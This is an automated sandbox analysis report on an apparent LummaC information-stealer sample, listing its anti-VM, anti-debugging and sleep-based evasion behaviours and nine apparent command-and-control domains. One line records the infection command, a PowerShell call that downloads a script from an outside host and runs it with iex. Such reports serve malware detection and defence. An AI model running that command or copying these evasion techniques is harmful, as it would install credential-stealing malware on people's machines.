Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6753			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2978			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

API coverage: 1.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136	Thread sleep count: 6753 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7156	Thread sleep count: 2978 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4320	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2836	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7132	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 7000	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 2588	Thread sleep time: -60000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00477BE0 FindFirstFileW,		4_2_00477BE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00495D80 FindFirstFileW,FindClose,		4_2_00495D80

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: Amcache.hve.12.dr	Binary or memory string: VMware
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr	Binary or memory string: VMware, Inc.
Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: svchost.exe, 00000003.00000002.2895794367.0000024B03A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896731206.0000024B09052000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2895818846.0000024B03A2B000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.000000000119D000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.000000000119D000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.12.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`.a
Source: Amcache.hve.12.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_051E6730 LdrInitializeThunk,

4_2_051E6730

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

4_2_0050E173

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

4_2_0050E173

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0050E640 LoadLibraryW,GetProcAddress,VirtualAlloc,

4_2_0050E640

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8055F mov edx, dword ptr fs:[00000030h]	4_2_00F8055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F80B1F mov eax, dword ptr fs:[00000030h]	4_2_00F80B1F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8116E mov eax, dword ptr fs:[00000030h]	4_2_00F8116E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F8116F mov eax, dword ptr fs:[00000030h]	4_2_00F8116F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 4_2_00F80ECF mov eax, dword ptr fs:[00000030h]	4_2_00F80ECF
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7055F mov edx, dword ptr fs:[00000030h]	8_2_00F7055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F70B1F mov eax, dword ptr fs:[00000030h]	8_2_00F70B1F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7116F mov eax, dword ptr fs:[00000030h]	8_2_00F7116F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F7116E mov eax, dword ptr fs:[00000030h]	8_2_00F7116E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 8_2_00F70ECF mov eax, dword ptr fs:[00000030h]	8_2_00F70ECF

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_005068B4 GetModuleFileNameW,___crtMessageBoxW,GetStdHandle,_strlen,WriteFile,__invoke_watson,GetProcessHeap,

4_2_005068B4

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 4_2_0050709C SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0050709C

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: PrivacyDrive.exe	String found in binary or memory: surroundeocw.shop
Source: PrivacyDrive.exe	String found in binary or memory: covvercilverow.shop
Source: PrivacyDrive.exe	String found in binary or memory: pumpkinkwquo.shop
Source: PrivacyDrive.exe	String found in binary or memory: abortinoiwiam.shop
Source: PrivacyDrive.exe	String found in binary or memory: deallyharvenw.shop
Source: PrivacyDrive.exe	String found in binary or memory: priooozekw.shop
Source: PrivacyDrive.exe	String found in binary or memory: racedsuitreow.shop
Source: PrivacyDrive.exe	String found in binary or memory: defenddsouneuw.shop
Source: PrivacyDrive.exe	String found in binary or memory: candleduseiwo.shop

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

4_2_00477990

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"			Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,FileTimeToSystemTime,GetDateFormatW,GetTimeFormatW,		4_2_00485BE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetDateFormatW,GetTimeFormatW,		4_2_00485D60

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
